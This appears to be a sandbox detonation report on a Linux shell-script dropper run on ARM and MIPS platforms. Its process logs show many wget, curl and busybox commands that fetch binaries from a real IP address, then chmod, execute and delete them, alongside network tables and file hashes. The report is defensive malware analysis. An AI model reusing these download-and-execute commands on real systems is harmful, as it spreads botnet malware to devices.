[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/chmod

[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/rm

[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 195.181.164.14:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 07:02

Reported

2024-11-21 07:05

Platform

debian9-armhf-20240611-en

Max time kernel

25s

Max time network

66s

Command Line

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
N/A /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ N/A
N/A /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /usr/bin/curl N/A
File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /usr/bin/curl N/A
File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /usr/bin/curl N/A
File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /usr/bin/curl N/A
File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /usr/bin/curl N/A
File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /usr/bin/curl N/A
File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /usr/bin/curl N/A
File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /usr/bin/curl N/A
File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /usr/bin/curl N/A
File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /usr/bin/curl N/A
File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /usr/bin/curl N/A
File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /usr/bin/curl N/A
File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /usr/bin/curl N/A

Processes

/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/chmod

[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/rm

[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/wget

[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/chmod

[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe

[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/rm

[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/wget

[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/chmod

[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz

[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/rm

[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/wget

[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/chmod

[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne

[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/rm

[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/wget

[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/chmod

[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo

[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/rm

[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/wget

[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/chmod

[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw

[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/rm

[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/wget

[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/chmod

[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8

[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/rm

[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/wget

[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/chmod

[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ

[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/rm

[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/chmod

[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/rm

[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/wget

[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/chmod

[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ

[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/rm

[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/chmod

[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG

[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/rm

[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/wget

[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/chmod

[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc

[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/rm

[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/wget

[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/chmod

[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/rm

[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/wget

[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/727-1-0xb670c000-0xb671d044-memory.dmp

memory/820-2-0xb6740000-0xb6751044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 07:02

Reported

2024-11-21 07:04

Platform

debian9-mipsbe-20240729-en

Max time kernel

74s

Max time network

76s

Command Line

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
N/A /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ N/A
N/A /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A
N/A /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 N/A
N/A /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
